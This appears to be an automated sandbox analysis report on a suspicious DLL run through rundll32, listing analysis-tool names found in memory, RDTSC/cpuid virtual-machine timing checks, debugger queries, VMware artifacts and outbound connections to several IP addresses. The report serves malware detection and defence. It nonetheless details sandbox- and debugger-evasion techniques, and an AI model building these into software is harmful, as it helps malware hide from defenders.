    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
    Source: rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXEE
    Source: rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522198075.0000025BF015E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEEEXENNER.EXEE
    Source: rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522198075.0000025BF015E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXET.EXEALL.EXEE
    Source: rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEJ
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXES
    Source: rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237881300.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEOB&|
    Source: rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522198075.0000025BF015E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEEFILE.EXEEXEE
    Source: rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXEERNETSECURITY
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
    Source: rundll32.exe, 0000000D.00000003.2371707051.0000025BEE244000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HREGMON.EXE
    Source: rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E0000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE#
    Source: rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HREGMON.EXEEEXEEXEEK.EXE
    Source: rundll32.exe, 0000000D.00000003.2563006653.0000025BF00D6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562791270.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXECK.EXE
    Source: rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEXZ
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE_
    Source: rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF016A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF016B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237777818.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF016A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF016C000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461727840.0000025BF016B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3522294812.0000025BF016E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEXE
    Source: rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HREGMON.EXETORE
    Source: rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXEEPY.
    Source: rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HREGMON.EXETOR
    Source: rundll32.exe, 0000000D.00000003.2487898021.0000025BF00EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FILEMON.EXEEXECXEEEXE TZ
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABBD6 second address: 7FFD944ABBE7 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov dword ptr [esp+000000C8h], eax 0x0000000a mov eax, 00000001h 0x0000000f cpuid 0x00000011 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABBE7 second address: 7FFD944ABBF1 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov dword ptr [esp+000000C0h], eax 0x0000000a rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABBF1 second address: 7FFD944ABBFD instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov ebx, eax 0x00000005 mov eax, 00000001h 0x0000000a cpuid 0x0000000c rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABBFD second address: 7FFD944ABC02 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov edi, eax 0x00000005 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC02 second address: 7FFD944ABC13 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov dword ptr [esp+000000B8h], eax 0x0000000a mov eax, 00000001h 0x0000000f cpuid 0x00000011 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC13 second address: 7FFD944ABC18 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov ebp, eax 0x00000005 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC18 second address: 7FFD944ABC24 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov edx, eax 0x00000005 mov eax, 00000001h 0x0000000a cpuid 0x0000000c rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC24 second address: 7FFD944ABC29 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov ebx, eax 0x00000005 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC29 second address: 7FFD944ABC35 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov ebp, eax 0x00000005 mov eax, 00000001h 0x0000000a cpuid 0x0000000c rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC35 second address: 7FFD944ABC3A instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov esi, eax 0x00000005 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC3A second address: 7FFD944ABC46 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov ecx, eax 0x00000005 mov eax, 00000001h 0x0000000a cpuid 0x0000000c rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC46 second address: 7FFD944ABC4B instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov edi, eax 0x00000005 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC4B second address: 7FFD944ABC57 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov esi, eax 0x00000005 mov eax, 00000001h 0x0000000a cpuid 0x0000000c rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC57 second address: 7FFD944ABC5C instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov esp, eax 0x00000005 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC5C second address: 7FFD944ABC83 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov eax, eax 0x00000005 dec esp 0x00000006 add ebx, dword ptr [esp+000000C8h] 0x0000000d dec eax 0x0000000e add edi, dword ptr [esp+000000C0h] 0x00000015 mov eax, 00000001h 0x0000001a cpuid 0x0000001c dec esp 0x0000001d add edx, dword ptr [esp+000000B8h] 0x00000024 dec ebp 0x00000025 add edx, ebx 0x00000027 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC83 second address: 7FFD944ABC8E instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov ebx, eax 0x00000005 dec esp 0x00000006 add ebx, ebp 0x00000008 dec eax 0x00000009 add ebx, edi 0x0000000b rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC8E second address: 7FFD944ABCA9 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov edi, eax 0x00000005 dec ecx 0x00000006 add ecx, ebp 0x00000008 dec ecx 0x00000009 add edi, esi 0x0000000b dec ebp 0x0000000c add ecx, esi 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 dec ebp 0x00000016 add ecx, edx 0x00000018 dec ebp 0x00000019 add edi, esp 0x0000001b rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABCA9 second address: 7FFD944ABCB4 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov edx, eax 0x00000005 dec ecx 0x00000006 add edi, ebx 0x00000008 dec esp 0x00000009 add edi, eax 0x0000000b rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABCB4 second address: 7FFD944ABCCC instructions: 0x00000000 rdtsc 0x00000002 dec ebp 0x00000003 add edx, ebx 0x00000005 dec ebp 0x00000006 add edx, edi 0x00000008 dec eax 0x00000009 add edi, eax 0x0000000b mov eax, 00000001h 0x00000010 cpuid 0x00000012 dec esp 0x00000013 add edi, ecx 0x00000015 dec ecx 0x00000016 sub edx, edi 0x00000018 rdtsc
    Source: C:\Windows\System32\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-2498
    Source: C:\Windows\System32\rundll32.exeAPI coverage: 0.0 %
    Source: C:\Windows\System32\loaddll64.exe TID: 6996Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
    Source: Amcache.hve.10.drBinary or memory string: VMware
    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
    Source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWAlar%SystemRoot%\system32\mswsock.dll
    Source: rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MBLMEM
    Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.10.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
    Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.10.drBinary or memory string: vmci.sys
    Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.10.drBinary or memory string: VMware20,1
    Source: rundll32.exe, 0000000D.00000003.2787058914.0000025BEE294000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual
    Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllERCPL.exe
    Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: calMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual
    Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
    Source: rundll32.exe, 0000000D.00000003.3089085224.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual
    Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: rundll32.exe, 0000000D.00000003.3012083156.0000025BEE2EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MBmory
    Source: rundll32.exe, 0000000D.00000003.2562770497.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MB
    Source: rundll32.exe, 0000000D.00000003.3089085224.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual
    Source: rundll32.exe, 0000000D.00000003.2562770497.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MB+
    Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\System32\rundll32.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 34.120.62.213 443Jump to behavior
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 195.133.1.117 80Jump to behavior
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 13.227.9.174 80Jump to behavior
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 13.227.9.48 80Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1Jump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\System32\rundll32.exe VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9465FC00 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00007FFD9465FC00
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521925258.0000025BF009A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SPIDERML.EXE
